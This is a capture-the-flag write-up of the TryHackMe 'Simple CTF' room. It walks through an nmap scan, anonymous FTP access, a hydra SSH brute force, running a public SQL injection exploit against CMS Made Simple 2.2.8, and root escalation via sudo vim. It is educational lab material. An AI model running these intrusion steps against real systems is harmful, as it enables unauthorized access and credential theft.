Simple CTF -WriteUP [TryHackMe]
TryHackme is a great platform for students to learn cybersecurity and for teachers to deploy rooms for students to learn.
Today we are going to see one of the rooms in TryHackMe i.e. Simple CTF. This room is created by MrSeth6797.
Guys, follow along with me by clicking on the link or clicking the image above.
QUESTIONS:
#1. How many services are runnig under port 1000?
#2. What is running on the higher port?
#3. What’s the CVE you are using against application?
#4. To what kind of vulnerability is the application vulnerable?
#5. What’s the password?
#6. Where can you login with the details obtained?
#7. What’s the user flag?
#8. Is there any other user in the home directory? What’s its name?
#9. What can you leverage to spawn a privileged shell?
#10. What’s the root flag?
SOLUTION:
NMAP AGGRESSIVE SCAN
The very first thing I did was a nmap aggressive scan. The reason being for performing a aggressive scan is that we can get as much as information possible regarding the ports and the services running on our target machine.
nmap -A -p- -T4 -oN initial machine_ip
Our nmap scan shows that we have total 3 ports open .i.e. 21(FTP), 80(HTTP) and 2222(SSH).
Our nmap scan gives the answers for the first two Questions #1 and #2.
As nmap scan tells that ftp allows anonymous login.
ftp machine_ip
The file we got from anonymous ftp is Formitch.txt
cat ForMitch.txt
So, we know that there may be a user Mitch for which the password is very weak. That’s intersting!
Hydra will do the password cracking for us.
hydra -l mitch -P /usr/share/dirb/worldists/others/best110.txt ssh://machine_ip:2222
This will help us answer the Question #5.
We will now see the web application that is running on the port 80(HTTP). For that we will navigate to the machine IP and we are provided with the default Apache page!
From here we will use gobuster and/or dirbuster to find the available directories.
gobuster dir -u http://machine_ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o gobuster.log
gobuster found the /simple directory in the web application. On navigating to the /simple directory in the web application we found CMSMade simple running.
It is running CMS made simple with version 2.2.8
Using searchsploit to search for the available exploits for CMS Made Simple 2.2.8
searchsploit CMS made simple 2.2.8
To answer the Question #3 we will execute this command searchsploit 46635 — examine | grep CVE
searchsploit 46635 — examine | grep CVE
So we have found the exploit, let’s try to execute it. We will copy the exploit to our directory and name it sqli.py and execute the exploit.
python sqli.py -u http://machine_ip/simple/ — crack -w /usr/share/dirb/wordlists/others/best110.txt
Running the exploit may or may not give error that termcolor is not found we can rectify the error by using the command pip install termcolor
pip install termcolor
Now after running the exploit we will get the username and password as follows:
The answer to Question #6 will be obvious, that we can login to ssh with details found.
ssh mitch@machine_ip -p 2222
We have logged in with Mitch’s credentials. I’ll change the shell here for my convenience with the command bash -i
bash -i
we have found the user flag and will be the answer to the Question #7.
To anwer the next Question .i.e. #8 we will navigate to /home directory to see the other user.
cd /home && ls
We are walking towards the end of this CTF and we have only two questions left. So for our second last question .i.e. Question #9 we will use command sudo -l to view if there is something we can run as sudo.
sudo -l
Great news, we can run vim with root privileges we just have to open vim and execute commands in the shell we will spawn in vim and our commands will be executed as root.
After that we get the root shell to the machine.
I hope you learnt something new with this writeup.
Happy Hunting
You can meet me at LinkedIn and twitter for further queries and drop your valuable suggestions at my handles.